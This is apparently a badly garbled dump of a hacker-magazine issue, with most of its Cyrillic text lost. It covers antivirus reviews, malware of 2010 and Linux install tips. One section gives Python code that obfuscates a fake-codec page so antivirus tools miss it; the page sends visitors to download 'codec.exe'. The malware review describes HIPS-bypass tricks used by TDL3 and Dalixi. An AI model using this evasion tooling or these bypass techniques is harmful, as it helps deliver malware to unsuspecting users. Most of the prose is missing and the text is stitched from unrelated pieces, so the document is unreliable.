( Torrent).
torrent .
T
(Tris).

P, .

WSO-
, Eastegger',

:).

http://eastegger.com.

: PWGen
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Christian Thoeing



.

PWGen,
. :
Free Open-Source;

AES SHA-2;
(
DLL',
Windows);

(
, ,
);
;
;
;
.

,

http://pwgen-win.
sourceforge.net. *nix , http://pwgen.sourceforge.
net.

: WSO Krist_ALL edition


: *nix/win
: Krist_ALL

WSO. Krist_ALL

, :
(
downloader', , , ,
);

( writable,
);
,
(
INFO);
;
( );

;

INFO;
;
php,
php;
milw0rm;
;
$t
(1 ,
2 );

.



http://exploit.in/forum/index.
php?showtopic=40939.z


MALWARE
lozovsky@gameland.ru

/INTERNET SECURITY
() Malware
. , ,
.
, , ,
:).
, , .
,
, :
anti-malware.ru, ,
- Deeoni$ ,

,
X

1. ,


USB- .
Microsoft Security
Essentials:
, ,
,
.

:

,
,
64- .
2.
: KIS, Dr. Web, Nod32, Symantec.
.

Avast.
3. ,
cloud- Symantec:

,

.
,
Symantec
.

:).
, , :

1. , . ?
2. , .
, .
3. , -
. ?

Security.
. Idle Mode
,
.
: -?. ,
:). , .
Symantec ,
.
,
.
.
exe - , ,
? .. , ,

:
, -
, .
.
, , .
.
, ,
.

1. .

STEP ,
PC_ZONE DVD

: Norton Internet


,
.
(
) ,

- :). IM-,
.
Dr.Web, -
, .
2. Dr.Web . . Spyder, .
,
.
3. :). , 10 KIS.
, ,
.
KIS ,
.

,
X

1. Microsoft
Security Essentials, ,
- .
.
,
,
. -
, , .
2. -: , , AVG,
Essentials. , -
, ,
, .
3. -,
.


,
MALWARE

,
UNIXOID

1. : KIS2011 Dr.Web

1.

, vast!. KIS
( , ,
:)), Dr.Web , 90-
OneHalf.
, , .
, : -,

-

- .
2. Avast! . ,
.
,
,
,

: , ,

.
.
3. Comodo. -,
Internet Security
, .
:), .
,
, ,
, ,
.

Eset Nod32.
, Dr.Web
Cureit!
.
. , :
- (
Win2k3r2) Kerio WinRoute Firewall
McAfee
;
(OpenBSD) Spamd
( greylisting) + Sendmail (
) + Clamav + Procmail ( ,
Maildir);
(WinXP) Eset Nod32
+ Dr.Web Cureit! + Kaspersky Virus Removal
Tool + MalwareBytes Anti-malware + AVZ (
) + Dr.Web LiveCD (

) + Acronis True Image BootCD (
/ ).
2.
Nod32,
.
.
3.
.
, ,
,

ANTI-MALWARE.RU
1.

Windows 7 x64,

,
.

Microsoft
Security Essentials, Avast 5 Free Anti-virus. ,

-
,
.
2. . :

,
,
.
, ,
, Microsoft, Avast Avira.

,
,

Windows XP,
, Kaspersky
Internet Security, Norton Internet
Security BitDefender Internet
Security.
3. ,

. ,

: , :
-
squid (
), havp clamav. : clamav ,
havp . Linux
.
.

DEEONI$,
- X

1. Avast Free Antivirus.


, ,
.
. , .
2. , . -,
. -,
, ,
. -, :
,
..
Ok.
3. Avira
AntiVir. , ,
. BitDefender, -
- (
) .

, , -
,

.

, Symantec
(Norton), Microsoft, Avast Panda.
,
,
,
.

Internet Security Total
Security -

( -).
, (
)
: ,
, , ,

.

,
, ,
.

Norton 360 -,

,

. z


MALWARE
presidentua http://tutamc.com

-

!


!

JS-

Python
.
,
. ?
!

-
.
80
.
JavaScript XOR. .
JavaScript
.
Internet Explorer,
. ,
,
,
.
JavaScript (, ).
:).


, ,
. ,
,
, .
JavaScript .

,
. - ( ,
, , ),
.
,
. ,

.

"Yo&#117; don't hav&#101; co&#100;e&#99;


fo&#114; vide&#111;".

, .
, +
String.fromCharCode ():
var a = "co" + "de" + String.fromCharCode(69) + "c";

(
) .
JavaScript, go_codec. ,
. , ,

. , ,
, go_codec - SDdsdsW,
go_codec SDdsdsW.
:

Trial-Reset

JavaScripta,
:
<script>
function go_codec()
{
location.href = "http://server/codec.exe";
}
var message = "You don't have codec for video";
alert(message);
setTimeout( go_codec(), 1000);
</script>

.

hex-. Python , :
import random
from string import letters
def morf_html_string(html):
    rez = ''
    for s in html:
        if s in letters and random.choice([True, False, False, False]):
            rez += "&#%s;" % ord(s)
        else:
            rez += s
    return rez

, (in
letters), 25% hex-. , a &#97;.
You don't have codec for video - :

class G(object):
    rand_var = {}

.

:
def rand_var(var):
    if var in G.rand_var:
        return G.rand_var[var]
    G.rand_var[var] = generate_string(5, 10)
    return G.rand_var[var]

;
, .
, 5
10 , .
, generate_
string! :

DVD
dvd



, JavaScript

.
,

.

WARNING
warning

.





Internet Explorer.


.


,

. :).

def generate_string(start=5, end=7):
    r = ''
    for _ in xrange(random.randrange(start, end)):
        r += random.choice(letters)
    return r


, , , .
- .
:
var b="aaa";
if ("aaaa"=="sdsdsd") asdasdas();
function sfsf(){};

get_el_, - :


def get_el_1():
    return "var %s='%s';" % (
        generate_string(4, 6),
        generate_string(4, 6)
    )

(get_
el_1, get_el_2 get_el_3) :
def random_js_element():
    def get_el_1():
        return "var %s='%s';" % (
            generate_string(),
            generate_string()
        )
    def get_el_2():
        return "if ('%s'=='%s') %s();" % (
            generate_string(),
            generate_string(),
            generate_string()
        )
    def get_el_3():
        return "function %s(){}" % (
            generate_string())
    fnc = "get_el_%s" % random.randrange(1, 4)
    return locals()[fnc]()

from tornado.template import Template
template_js = "our_example_template"
js = Template(template_js).generate(
    rand_var=rand_var,
    morf_html_string=morf_html_string,
    random_js_element=random_js_element
)

, .
,

locals().
, , :
>>> random_js_element()
'function aErfSA(){}'
>>> random_js_element()
"if ('uHsJi'=='YvEwVNttta') pxQdHssd();"
>>> random_js_element()
"var yrSfsdgS='OywZCvq';"

,
.
, . . Template- - TornadoWeb.



JavaScript. ,
.
,
, JavaScript
:
{{ }}
var a = "{{ (" ") }}"

, , .

( template_js) JavaScript, ( Template) .


JS .
Tornado-
. :
<script>
{{ random_js_element() }}
function {{ rand_var("go_codec") }}(){
location.href = "{{ morf_html_string("http://server/codec.exe") }}";
}
var {{ rand_var("message") }} = "{{ morf_html_string("You don't have codec for video") }}";
alert({{ rand_var("message") }});
setTimeout( {{ rand_var("go_codec") }}(), 1000);
{{ random_js_element() }}
</script>

Pythona
random randrange
choice. ,
start stop:
random.randrange(start, stop)
.
,
- . , 33%:
if random.choice([True, False, False]):
    print "33.33333%"
string
:
from string import letters
>>> letters
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

letters ( ),
ascii_letters .

, .

,
{{ random_js_element() }}
( ). , rand_var - {{
rand_var("go_codec") }}.
{{ morf_html_string("http://server/codec.
exe") }}.


, .


, ,
:
location.href = "http://codec/codec.exe";

:
var a = location;
a.href = "http://codec/codec.exe";
a["h"+"ref"] = "http://codec/codec.exe";

, :
var {{ rand_var("location") }} = location;
{{ rand_var("location") }}["{{ morf_html_
string("href") }} "] = "{{ morf_html_
string("http://codec/codec.exe") }}";

, 2

-
:)

JavaScript-:
def many_random_js(start=0, stop=5):
    rez = ""
    for _ in xrange(random.randrange(start, stop)):
        rez += random_js_element()
    return rez


{{ many_random_js() }}.
. :
, ,
. ,
, JavaScript- . , ,
.
, ,
? .
,

. .
PS: , , !
(-, ,
, , . ) :). z

links

JavaScript compressors and obfuscators:
http://developer.yahoo.com/yui/compressor/
http://code.google.com/closure/compiler/
http://jscrambler.com/
http://javascriptobfuscator.com/
http://www.stunnix.com/prod/jo/
http://www.crockford.com/javascript/jsmin.html
http://www.daftlogic.com/projectsonline-javascriptobfuscator.htm

TornadoWeb, whose Template class is used in this article:
http://www.tornadoweb.org/

The Python IDE used for the code: PyCharm.



One more Python detail: defaultdict from the collections module, on which rand_var is built. A defaultdict calls the factory function it was given whenever a missing key is looked up and stores the result under that key, so the same key always returns the same generated name:

>>> from collections import defaultdict
>>> a = defaultdict(generate_string)
>>> a["go_codec"]
'dqQSfw'
>>> a["location"]
'EdstEf'
>>> a["go_codec"]
'dqQSfw'
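The whole morphing engine in one piece, as an added example (not the article's code): generate_string, a stand-in for morf_html_string, the defaultdict-based rand_var, the three junk-statement forms and many_random_js, plus a renderer that emits the article's fake-codec script with plain string formatting instead of a Tornado template. It is written from the side of someone who has to detect such pages, so it also contains the inverse of the string morphing: decode_js_escapes gives back what the browser actually sees, and string_literals pulls the decoded literals out of a generated script. The behaviour of generate_string and morf_html_string is assumed (letters-only identifiers; literals rewritten with \xNN and \uNNNN escapes), and the URL used in the test is a constructed example.invalid address.

```python
import random
import re
import string
from collections import defaultdict


def generate_string(rng, min_len=4, max_len=10):
    """Assumed behaviour of the article's generate_string(): a random identifier
    made of letters only, so it is always a valid JavaScript identifier."""
    length = rng.randrange(min_len, max_len + 1)
    return "".join(rng.choice(string.ascii_letters) for _ in range(length))


def morf_string(rng, text):
    """Assumed behaviour of morf_html_string(): rewrite the body of a string
    literal so that the bytes differ on every run while the value stays the same.
    Every character is emitted verbatim, as \\xNN or as \\uNNNN; quotes and
    backslashes are always escaped so the result stays a valid literal body."""
    out = []
    for ch in text:
        style = rng.randrange(3)
        if style == 0 or ch in '"\'\\':
            out.append("\\x%02x" % ord(ch))
        elif style == 1:
            out.append("\\u%04x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})")


def decode_js_escapes(literal_body):
    """Inverse of morf_string: the text a JavaScript engine sees. A detector has to
    normalise like this before matching strings, since the raw bytes differ per page."""
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), literal_body)


class JsMorpher(object):
    """One instance per generated page: the same logical name always maps to the
    same random identifier (the defaultdict trick from the article)."""

    def __init__(self, seed=None):
        self.rng = random.Random(seed)
        self.used = set()
        self.names = defaultdict(self._fresh_name)

    def _fresh_name(self):
        while True:                       # never hand out the same identifier twice
            name = generate_string(self.rng)
            if name not in self.used:
                self.used.add(name)
                return name

    def rand_var(self, logical_name):
        return self.names[logical_name]

    def random_js_element(self):
        """A junk statement that does nothing: the three forms from the article."""
        g = self.rng
        form = g.randrange(3)
        if form == 0:
            return "var %s='%s';" % (self._fresh_name(), generate_string(g))
        if form == 1:
            a = generate_string(g)
            b = generate_string(g)
            while b == a:                 # equal strings would call an undefined function
                b = generate_string(g)
            return "if ('%s'=='%s') %s();" % (a, b, generate_string(g))
        return "function %s(){}" % self._fresh_name()

    def many_random_js(self, start=0, stop=5):
        return "".join(self.random_js_element() for _ in range(self.rng.randrange(start, stop)))

    def render(self, url, message):
        """The article's fake-codec script with every name and literal morphed
        (plain formatting stands in for the Tornado template)."""
        rv = self.rng and self.rand_var
        return (
            "<script>\n"
            + self.many_random_js(1, 4) + "\n"
            + "function %s(){ location.href = \"%s\"; }\n" % (rv("go_codec"), morf_string(self.rng, url))
            + "var %s = \"%s\";\n" % (rv("message"), morf_string(self.rng, message))
            + "alert(%s);\n" % rv("message")
            + "setTimeout(%s, 1000);\n" % rv("go_codec")   # the function itself, not a call
            + self.many_random_js(1, 4) + "\n"
            + "</script>"
        )


def morph_roundtrip(text, seed=0):
    """True if decoding the morphed literal gives the original text back."""
    return decode_js_escapes(morf_string(random.Random(seed), text)) == text


def string_literals(script):
    """Decoded contents of every double-quoted literal in a generated script."""
    return [decode_js_escapes(m) for m in re.findall(r'"((?:[^"\\]|\\.)*)"', script)]
```

Two pages rendered with different seeds share no bytes worth signing on, but string_literals returns the same URL and message for both: that is the point for anyone writing detection, normalise first, then match.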


MALWARE
, ESET, www.twitter.com/matrosov

TOP-5 2010

,
.
,
,
. 2010 ,
.

>> coding

Stuxnet


. , Stuxnet
,
.

. , .

Stuxnet ( )
. HIPS-,
. , , , Realtek JMicron.

Microsoft,
, . ? MS! , MS ,
. ,
, , .
.
, Stuxnet .
- ,
, , , .
0-day

,
. MS10-046,
, LNK/PIF-.
,
.
,
,
.
:
[Figure: the TDL3 hidden file system (tdl, config.ini, file table)]

MS10-061 Print Spooler,


.
.
MS08-067 , ,
Conficker.
. ,
, , Conficker
.
, Stuxnet
. ,
,
.

. : Win2000/XP
Vista/Win7.
MS10-073 win32k.sys, Win2000/XP .
,


Lnk-, Stuxnet

TDL4 MBR
. ,
Stuxnet . .
( Vendor-ID) (Task
Scheduler), SYSTEM Vista/Win7/Win2008.
.
, ,

. ,

Smartcard API !
,
( PoC) Microsoft. , ,
:).

CVE-2010-2772, Siemens Simatic
WinCC PCS 7 SCADA, -

MS Internet Explorer ( Zeus)

, TDL4


[Figure: Stuxnet propagation and installation vectors in MS Windows. Win2000/XP: general attack vector through removable devices (MS10-046), privilege escalation through MS10-073; Vista/Win7/Server 2008: additional attack vector, installation and privilege escalation through MS10-0XX; propagation over the local network: MS08-067, MS10-061, Microsoft SQL in WinCC.]

[Figure: TDL3 installation path. Labels: SeLoadDriver(Privilege); PrintProcessor; a PE with IMAGE_FILE_DLL; ShellExecute; AddPrintProcessor API; DeletePrintProcessor API (TDL3); DRIVER_SECTION chain: pci.sys, Driver1.sys, ...]

Stuxnet ,
:
- , Microsoft
Visual C++. , . ,
. -, : , .
,
,


.

P2P,
, , .
, Stuxnet,
. Stuxnet Under the Microscope
70 ,
:).

TDL4

, 64-,
. TDL4
TDL3,
. TDL4
64 Windows.
,

[Figure residue: the DRIVER_SECTION chain continues with Driver2.sys ... DriverN.sys, Driver32k.sys]

Infecting the MBR is not a new idea: Mebroot and StonedBoot did it before. What is new is that TDL4 uses it to get past the restrictions of the 64-bit kernel, which TDL3 could not. Installation, as far as the surviving text shows:

- the installer works with the physical drive (\\??\PhysicalDrive0) rather than with the C: volume;
- the components are written into the hidden file system (as in TDL3);
- the original MBR is saved and replaced with the bootkit's own;
- on x64 the machine is then restarted with the WinAPI function ExitWindowsEx(), and if that fails, ZwRaiseHardError() forces the reboot.

The boot sequence after that:

- the BIOS loads the infected MBR;
- the TDL4 MBR loads ldr16 from the hidden file system;
- ldr16 hooks interrupt 13h and, depending on the system (x32 or x64), loads ldr32 or ldr64;
- ldr32 or ldr64 loads the TDL4 driver itself, outside the normal driver-loading API;
- the driver object is created with IoCreateDriver().

Beyond that TDL4 keeps the hidden file system and the rest of the infrastructure it inherited from TDL3.

TDL3

TDL3 has been described before, so only the 2010 changes matter here. The last version seen is 3.273. During 2010 the installer changed (partly with, as the author puts it, some help from MS) and gained a new HIPS bypass.

[Figure: Stuxnet]

HIPS bypass: the WinAPI functions AddPrintProcessor and AddPrintProvidor are used to get the driver loaded, because HIPS products did not intercept them.

[Chart: HIPS bypass techniques by family: Stuxnet, TDL4, TDL3, Dalixi, Zeus2, MBR]

To load its driver TDL3 needs two things: the SE_LOAD_DRIVER_PRIVILEGE privilege, and a process that has it. The privilege is obtained with the WinAPI function RtlAdjustPrivilege; for the process, the installer copies itself into %PrintProcessor% and registers the file with AddPrintProcessor/AddPrintProvidor under the name tdl, after which the spooler loads it over RPC (in its own context). The driver is loaded from there, which is exactly the step the HIPS products were not watching.

The installer is easy to follow in the Hex-Rays decompiler (the call sequence is shown in the screenshot). The two functions are declared as follows:

BOOL AddPrintProcessor(
    __in LPTSTR pName,
    __in LPTSTR pEnvironment,
    __in LPTSTR pPathName,
    __in LPTSTR pPrintProcessorName
);

and:

BOOL AddPrintProvidor(
    __in LPTSTR pName,
    __in DWORD Level,
    __in LPBYTE pProviderInfo
);


TDL3 keeps its components in its own hidden file system rather than in the regular one. The hidden file system contains:

- the user-mode module (tdlcmd.dll);
- the configuration (config.ini);
- the driver (tdl);
- resources (rsrc.dat);
- and other files.

The hidden file system of an infected disk can be dumped with tfd.exe (TdlFsDumper, http://j.mp/tdl_dump).

Dalixi


.
,
Dalixi HIPS
.

To evade HIPS, Dalixi removes the callbacks that HIPS drivers register with PsSetLoadImageNotifyRoutine, PsSetCreateProcessNotifyRoutine and PsSetCreateThreadNotifyRoutine (printed as PsCreateThreadNotifyRoutine in the original), and it does so without loading a driver of its own: it calls ZwSystemDebugControl, exported by ntdll.dll:

NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
    IN SYSDBG_COMMAND Command,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength,
    OUT PULONG ReturnLength OPTIONAL
);

With the SysDbgCopyMemoryChunks_1 command the function copies a user-mode buffer into kernel memory, and all it asks for is SeDebugPrivilege. The command is gone from Vista on, so Dalixi uses SysDbgCopyMemoryChunks_1 on the systems where it still works. InputBuffer points to a structure of this form:

typedef struct _CPY_MEM_CHUNCKS_BUFFER
{
    void *Destination;   // pointer to kernel-mode destination buffer
    void *Source;        // pointer to user-mode source buffer
    ULONG Size;          // size of the user-mode source buffer
} CPY_MEM_CHUNCKS_BUFFER, *PCPY_MEM_CHUNCKS_BUFFER;

Writing over the callback entries this way unregisters them, and the HIPS driver never sees a callback it would have to refuse.

, ,
Dalixi ,
. callback.

Zeus 2

Zeus needs no introduction, so only the changes of the second major version are covered. Besides the usual theft of credentials, Zeus 2 got a VNC module and notifications over Jabber (reporting new logins in real time). It also steals the user's X.509 certificates, private keys included; the CryptoAPI function PFXImportCertStore is used to work with the exported stores:

HCERTSTORE WINAPI PFXImportCertStore(
    __in CRYPT_DATA_BLOB *pPFX,
    __in LPCWSTR szPassword,
    __in DWORD dwFlags
);

, , ,
Zeus ,
Stuxnet.

, zeus-.
, , ,
- .
, ,
.
Zeus ,
,
MS Internet Explorer
. , ,
,
.
, , .

Zeus
.
,
,
-
Smartcard API.
, Zeus,
SpyEye, , ,
, -
. C&C
, , .

.

. , . z

zobnin@gmail.com

Linux BSD
,
:
, .
, . ,
, .
,


,
. ,

,
.
,
. , ,
, .
,
,
- (, Windows). ,
(,
Linux), .



.

,
.
,
.

Linux,
Windows

-
.
UNetbootin
(unetbootin.sourceforge.net) USB- ,

.
, Ubuntu (www.
ubuntu.com/desktop/get-ubuntu/windowsinstaller) OpenSUSE (en.opensuse.org/
Instlux), UNetbootin
( Linux, BSD,
Linux). ,
, grub4dos ISO- -

UNIXOID

Installing FreeBSD from Windows: VirtualBox (VirtualBox-3.2.10-66523-Win.exe here) is used, and the trick is to give the virtual machine the real disk instead of a disk image. For that, create a raw-disk VMDK that points at the physical drive (the command is one line; cmd.exe has no line continuation):

> cd c:\Program Files\Oracle\VirtualBox
> VBoxManage internalcommands createrawvmdk -filename c:\realhd.vmdk -rawdisk \\.\PhysicalDrive0 -register


Windows
. .
,
UNIX- , ,
UNIX (,
BSD Linux-). UNetbootin, ISO-
initrd- Grub (
BSD).

Windows Linux.

,
. , ,
Solaris
, . VirtualBox,
(www.virtualbox.org).

This creates realhd.vmdk describing the whole disk (\\.\PhysicalDrive0 is the first physical drive in Windows), and '-register' adds it to VirtualBox. On Linux the same thing is:

$ sudo VBoxManage internalcommands createrawvmdk -filename ~/realhd.vmdk -rawdisk /dev/sda -register

ISO- Linux- . , NTFS- Partition Magic WinXP/Win2k3


diskmgmt.msc Vista/Seven.
VirtualBox , .
, ,
CD-ROM . Linux .
, ,
(
,
VirtualBox). ,
(
Installing Linux from FreeBSD

To install Linux (Ubuntu here) over a running FreeBSD, UNetbootin is no help, but grub from the ports tree can boot the installer ISO:

# cd /usr/ports/sysutils/grub
# make install clean
# mkdir /boot/grub
# cp /usr/local/share/grub/i386-freebsd/* /boot/grub/
# touch /boot/grub/menu.lst
# sysctl kern.geom.debugflags=16
# grub-install /dev/ad0

Then add an entry for the ISO to menu.lst:

# vi /boot/grub/menu.lst
title Ubuntu 10.10 AutoInstall
# X, Y, Z: the disk, the partition and the path where the ISO lies
map (hdX,Y,Z)/ubuntu-10.10-server-i386-auto.iso (hd32)
map --hook
chainloader (hd32)

).
,
.
DHCP-, ,
SSH- ,
(, ).
,
SSH.

Windows Linux. UNetbootin

UNetbootin (Universal Netboot Installer) , USB-


UNIX- UNIX .
Windows, Linux,
( Linux BSD)
. ,
Ubuntu.
.
unetbootin.sf.net
Download (for Windows for Linux).
( Linux- ). UNetbootin,
, , (NetInstall
HdMedia ),
, ,
.
,
UNetbootin
Linux-,
.
,
(
). ,
.
,
ISO- Ubuntu,
.
Ubuntu-10.10 ( ),
(
preseed-). :
1. Mount the Ubuntu 10.10 server ISO and copy its contents to a working directory:

$ sudo mount -o loop ubuntu-10.10-server-i386.iso /cdrom
$ mkdir mycd
$ rsync -a /cdrom/ mycd

2. Write the preseed file (the comments explain each line):

$ vi auto.seed
# locale
d-i debian-installer/locale string ru_RU
# keyboard: do not ask, use the us layout
d-i console-setup/ask_detect boolean false
d-i console-setup/layoutcode string us
# network interface: pick automatically
d-i netcfg/choose_interface select auto
# use an FTP mirror
d-i mirror/protocol string ftp
# partitioning: use the largest free space
d-i partman-auto/init_automatically_partition select biggest_free
# one partition for everything
d-i partman-auto/choose_recipe select atomic
# Ext4
d-i partman/default_filesystem string ext4
# do not ask for confirmation
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
# user "user" with password "resu"
d-i passwd/user-fullname string Ubuntu User
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
# package set: ubuntu-desktop here,
# kubuntu-desktop or ubuntu-server are the alternatives
tasksel tasksel/first multiselect ubuntu-desktop
# install the SSH server
d-i pkgsel/include string openssh-server
# boot loader: keep the other installed systems in the menu
d-i grub-installer/with_other_os boolean true
# X server (Ubuntu, autodetect the monitor)
xserver-xorg xserver-xorg/autodetect_monitor boolean true
$ sudo cp auto.seed mycd/preseed

[Figure: UNetbootin]

The keyboard layout is deliberately us; the seed installs openssh-server and creates the user "user" with the password "resu", so after the reboot the machine can be reached over SSH. This variant assumes DHCP; on a network without it replace the line "d-i netcfg/choose_interface select auto" with a static configuration:

# IP address
d-i netcfg/get_ipaddress string 192.168.0.1
# netmask
d-i netcfg/get_netmask string 255.255.255.0
# gateway
d-i netcfg/get_gateway string 192.168.0.2
# do not ask to confirm
d-i netcfg/confirm_static boolean true
# DNS server
d-i netcfg/get_nameservers string 8.8.8.8

3. Make the boot loader use the preseed file:

$ sed -e 's#file=/cdrom/preseed/ubuntu.seed#auto=true\ priority=critical\ file=/cdrom/preseed/auto.seed#' mycd/isolinux/txt.cfg > txt.cfg
$ sudo mv txt.cfg mycd/isolinux/

4. Regenerate the checksums:

$ cd mycd
$ sudo rm md5sum.txt
$ find -type f -print0 | sudo xargs -0 md5sum | grep -v isolinux/boot.cat | sudo tee md5sum.txt

5. Build the ISO:

$ sudo mkisofs -D -r -V "Ubuntu 10.10 AutoInstall" -cache-inodes -J -l -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table -o ../ubuntu-10.10-server-i386-auto.iso .

Grub4dos on Vista/Seven
1. Copy grldr, grldr.mbr and menu.lst to C:;
2. Add a boot entry to the Windows boot manager:

> bcdedit /create /d "Grub4Dos" /application bootsector

3. Point the entry at grldr.mbr (ID is the identifier the previous command printed):

> bcdedit /set ID device partition=C:
> bcdedit /set ID path \grldr.mbr
> bcdedit /displayorder ID /addlast
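An added example, not part of the article, for the two places in this procedure where an unattended install goes wrong silently: the password lines of the seed and the isolinux edit of step 3. The installer's user-setup hands the value of passwd/user-password-crypted to usermod -p, which writes it into /etc/shadow as is, so the value has to be a crypt(3) string ($1$, $5$, $6$, bcrypt or the old 13-character DES form); a bare hex digest like the one in the seed above would never match at login. audit_preseed flags that, plaintext passwords and allow-password-weak; point_isolinux_at_seed does the same rewrite as the sed in step 3. The seed and txt.cfg samples are constructed for the test (the hardened hash is a dummy $6$ string, not a real password hash).

```python
import re

# crypt(3) forms that /etc/shadow understands: $1$ (MD5), $5$/$6$ (SHA-256/512),
# $2a$/$2b$/$2y$ (bcrypt), $y$ (yescrypt), or the classic 13-character DES string
CRYPT3_RE = re.compile(r"^(\$(1|5|6|2[aby]?|y)\$\S+|[./0-9A-Za-z]{13})$")


def parse_preseed(text):
    """(owner, question, type, value) for every directive. Comments and blank lines
    are skipped; a trailing backslash joins the next line, as debconf-set-selections does."""
    entries = []
    for line in text.replace("\\\n", " ").splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        owner, question, qtype = parts[:3]
        entries.append((owner, question, qtype, parts[3] if len(parts) == 4 else ""))
    return entries


def audit_preseed(text):
    """What a reviewer would flag in an unattended-install seed, as a list of strings."""
    findings = []
    answers = dict((q, v) for _, q, _, v in parse_preseed(text))
    for q in ("passwd/user-password", "passwd/root-password"):
        if q in answers:
            findings.append(q + ": plaintext password in the seed file")
    for q in ("passwd/user-password-crypted", "passwd/root-password-crypted"):
        if q in answers and not CRYPT3_RE.match(answers[q]):
            findings.append(q + ": value is not a crypt(3) hash; "
                            "the installer stores it verbatim in /etc/shadow")
    if answers.get("user-setup/allow-password-weak") == "true":
        findings.append("user-setup/allow-password-weak: weak passwords are allowed")
    return findings


def point_isolinux_at_seed(txt_cfg, seed_path="/cdrom/preseed/auto.seed"):
    """The same edit as the article's sed: boot fully automatically with our seed."""
    return re.sub(r"file=/cdrom/preseed/\S+\.seed",
                  "auto=true priority=critical file=" + seed_path, txt_cfg)


# Constructed samples (not the article's files). The first mirrors the password
# lines of the seed above; the second uses a dummy crypt(3) SHA-512 string.
SEED_ARTICLE_STYLE = """\
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
d-i pkgsel/include string openssh-server
"""

SEED_HARDENED = """\
d-i passwd/username string user
# value produced with: mkpasswd -m sha-512 (dummy here)
d-i passwd/user-password-crypted password $6$saltsalt$dummyhashdummyhashdummyhash
"""

TXTCFG_SAMPLE = """\
default install
label install
  menu label ^Install Ubuntu Server
  kernel /install/vmlinuz
  append  file=/cdrom/preseed/ubuntu-server.seed vga=788 initrd=/install/initrd.gz quiet --
"""
```

Run audit_preseed over the seed before building the ISO; a box that installs with openssh-server and a password that cannot match is not reachable at all, and one that installs with a weak or plaintext password is reachable by everyone.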

ISO- ,
UNetbootin, ,
ISO-, .
UNetbootin
, ,

UNetbootin , .
ISO-, UNetbootin.
. 30
, .
Debian,
.
,
(, Kickstart RedHat).

Windows Linux. Grub4dos


UNetbootin. ,
, .
Grub4dos Grub,
FAT32 NTFS-, Ubuntu
WinXP.
Grub4dos
Windows , .
sourceforge.net/projects/grub4dos/
files/, Grub4dos
grldr menu.lst C:. c:/boot.ini
[boot loader] :
default=c:\grld

:
On WinXP, add a line for grldr to the [operating systems] section of c:\boot.ini (this is what UNetbootin does as well):

c:\grldr="Grub4Dos"

Then describe the ISO in c:\menu.lst:

title Ubuntu 10.10 AutoInstall
find --set-root /ubuntu-10.10-server-i386-auto.iso
map /ubuntu-10.10-server-i386-auto.iso (hd32)
map --hook
chainloader (hd32)

Put the ISO in the root of C:, reboot, choose the new entry, and about 30 minutes later the machine is reachable over SSH as the user "user" with the password "resu".

Installing FreeBSD from Linux

The other direction is harder: FreeBSD, unlike Linux, has nothing like preseed, so its installer cannot simply be told all the answers in advance. The plan is therefore different: from the running Linux we write a minimal FreeBSD to the disk, one that boots with the network and SSH up, and finish the installation over SSH with sysinstall.

That minimal FreeBSD is mfsBSD (mfsbsd.vx.sk), an image that lives entirely in memory. Steps:

1. Get the mfsBSD build scripts and unpack them:

$ wget mfsbsd.vx.sk/release/mfsbsd-1.0.tar.gz
$ tar xzf mfsbsd-1.0.tar.gz
$ cd mfsbsd-1.0

2. Create rc.conf from the sample and put the network settings into it:

$ cp conf/rc.conf.sample conf/rc.conf
$ vi conf/rc.conf
# default gateway
defaultrouter="192.168.0.1"
# interface address
ifconfig_re0="inet 192.168.0.2 netmask 255.255.255.0"

WARNING: re0 is the name of the network interface. Take it from the kernel messages of a running FreeBSD (dmesg) or work it out from the driver: re0 is the first card handled by the re driver (a RealTek 8139C, for example). If the network has DHCP, one line is enough:

ifconfig_re0="DHCP"

3. Mount the FreeBSD installation ISO (from ftp://ftp.freebsd.org) so the build scripts can take the base system from it:

$ sudo mount -o loop FreeBSD-8.1-RELEASE-i386-disc1.iso /cdrom

4. Build the image and copy the resulting disk.img to the target machine:

$ scp disk.img root@192.168.0.1:.

5. On the target, as root, write the image over the system disk and reboot:

# dd if=/root/disk.img of=/dev/sda bs=1M
# reboot

INFO: on Linux, VirtualBox is not the only option; qemu boots the real disk just as well:

$ sudo qemu -hda /dev/sda -cdrom ubuntu-10.10-desktop-i386.iso -boot d


root, mfsroot,
sysinstall
FreeBSD.
FTP HTTP.
,

( , ),
.

, , ,
, ,
,
. ,
, , -
. z

Adept adeptg@gmail.com

OPENSOURCE

, , ,
, .
OpenSource 2010 .
, .

, Sun Microsystems,
, - ,
2008. 2009 , Oracle,
7 .
2010
. , Oracle (
OpenSource) ,
Sun.
, Java ,
Oracle . bugfix security- JDK6.
Oracle
JDK7 JDK8 2011 2012
.
VM
, , unicode, XML
JDBC.
OpenSolaris , Java: Oracle
.
, Solaris
Express. ,
;

( CDDL,
GPL),
. OpenSolaris
.
, Illumos. ,

.
.
Sun Oracle

MySQL. Oracle ,
,
. MySQL,
,
MariaDB. ,
Oracle
MySQL
( Sun).

OpenSource- , Oracle
OpenOffice. 2010 3.2
:
. ,
, , ,

;
MS Office,
,
, ;

OpenType, TrueType;
Calc , .
Sun OpenSource-.
VirtualBox. ,
,
-. ,
(
),
, , USB
RDP-,
RDP-.
, Sun Netbeans.
Oracle . ,
,
. 6.9
( RoR 3, JavaFX
SDK 1.3, ), 2011
7.0.

Linux

Sun , Linux
: 2.6.33-2.6.36.

links
illumos.org (the OpenSolaris fork)
www.documentfoundation.org (The Document Foundation)
meego.com (Meego)

INFO
Firefox 4
The Oracle and Sun story was covered in ][ 131.

FireFox 4

,
:
Nouveau . Nouveau
,
